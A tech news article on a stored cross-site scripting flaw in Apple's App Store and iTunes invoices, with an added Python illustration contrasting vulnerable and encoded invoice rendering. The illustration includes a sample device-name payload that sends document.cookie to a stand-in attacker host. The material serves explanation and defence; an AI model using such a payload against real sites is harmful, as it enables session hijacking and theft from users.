Critical vulnerability found in Apple App Store, iTunes

Device name in invoices can be swapped with malicious code.

Researchers have discovered a critical flaw in Apple's App Store and iTunes invoicing system that could allow attackers to hijack sessions, redirect to external sources and launch persistent phishing attacks.

Vulnerability Lab researcher Benjamin Kunz Mejri published details of the flaw and a proof of concept today.

The flaw is an application-side (persistent) input validation vulnerability, rated critical because it lets a remote attacker inject script into Apple's content and services modules, where it is stored and later rendered to other users.

When a user buys something from iTunes or the App Store, Apple's systems use the device name as part of the invoice sent to the buyer and seller.

A remote attacker can exploit the flaw by setting their device name to malicious code; the unfiltered name is then embedded in the invoice delivered to both the buyer and the seller accounts, Mejri found.

Attackers could then hijack sessions, redirect to external sources and launch persistent phishing attacks as well as “persistent manipulation of affected or connected service module context,” Mejri warned.

"The invoice is present to both parties (buyer and seller) which demonstrates a significant risk to buyers, sellers or Apple website managers/developers," he said.

"The issue impact [is] also the risk that a buyer can be the seller by usage of the same name to compromise the store online service integrity."

Reproducing the vulnerability was as simple as changing a device's name to a malicious script, buying something from the App Store or iTunes, and opening the invoice generated after the purchase, which contained the script, he said.
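The pattern described above is a stored cross-site scripting bug: an attacker-controlled field (the device name) is written into a document (the invoice) that is later rendered, unencoded, to other parties. The following is an added, constructed illustration of that pattern and of its fix, not Apple's code and not Vulnerability Lab's proof of concept. The invoice renderer, the device-name allow-list and the sample malicious name are all hypothetical; the point is that the vulnerable renderer interpolates the raw name into HTML, while the fixed one HTML-encodes every untrusted field at the sink and, as defence in depth, rejects names that fall outside an allow-list when they are set.

```python
"""Constructed example of a stored-XSS pattern via an untrusted device name.

Hypothetical code written for this article; it is not Apple's invoicing code
and not the published proof of concept.
"""
import html
import re

# Constructed sample: a device name an attacker could set on their own device.
# A real payload would be tuned to the target page; this one only needs to
# show that script reaches the invoice unencoded.
MALICIOUS_DEVICE_NAME = (
    '<script>document.location="https://attacker.example/?c="'
    "+document.cookie</script>"
)

# Hypothetical allow-list: letters and digits in any script (\w is Unicode-
# aware in Python 3), spaces, dots, apostrophes and hyphens, 1-64 characters.
# This is validation at the point where the name is *set*; it is not a
# substitute for encoding at the point where the name is *rendered*.
DEVICE_NAME_RE = re.compile(r"[\w .'\-]{1,64}")


def validate_device_name(name: str) -> bool:
    """Return True if the name matches the allow-list, False otherwise."""
    return DEVICE_NAME_RE.fullmatch(name) is not None


def render_invoice_vulnerable(device_name: str, item: str, price: str) -> str:
    """Flawed pattern: untrusted fields are interpolated straight into HTML.

    Whatever the buyer named their device is emitted verbatim, so a name
    containing markup or script is executed by every viewer of the invoice
    (buyer and seller alike).
    """
    return (
        "<html><body><h1>Invoice</h1>"
        f"<p>Item: {item}</p><p>Price: {price}</p>"
        f"<p>Device: {device_name}</p>"
        "</body></html>"
    )


def render_invoice_fixed(device_name: str, item: str, price: str) -> str:
    """Hardened pattern: every untrusted field is HTML-encoded at the sink.

    html.escape turns <, >, &, " and ' into entities, so the device name is
    displayed as text rather than parsed as markup. Encoding at the sink is
    the primary fix because the same stored value feeds several views.
    """
    return (
        "<html><body><h1>Invoice</h1>"
        f"<p>Item: {html.escape(item)}</p><p>Price: {html.escape(price)}</p>"
        f"<p>Device: {html.escape(device_name)}</p>"
        "</body></html>"
    )


def contains_script(html_doc: str) -> bool:
    """Crude check used here to show whether a live <script> tag survived."""
    return "<script" in html_doc.lower()


if __name__ == "__main__":
    # Hypothetical purchase details.
    item, price = "Example App", "$0.99"
    print("allow-list accepts payload:", validate_device_name(MALICIOUS_DEVICE_NAME))
    print("vulnerable invoice executes script:",
          contains_script(render_invoice_vulnerable(MALICIOUS_DEVICE_NAME, item, price)))
    print("fixed invoice executes script:",
          contains_script(render_invoice_fixed(MALICIOUS_DEVICE_NAME, item, price)))
```

The two layers are deliberately separate: the allow-list stops obvious payloads early and keeps garbage out of the data store, but it would not protect a second sink (for example, a plain-text e-mail or a seller dashboard) that renders the same field with different rules, and an over-strict list rejects legitimate names. Output encoding chosen for the specific context in which the value is rendered is what actually closes the bug.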

Mejri discovered the vulnerability in June and reported it to Apple. 

It appears the company patched the hole soon after being notified of its existence.

Apple included fixes for 80 security issues in its most recent set of patches for OS X and iOS earlier this month.

Copyright © iTnews.com.au . All rights reserved.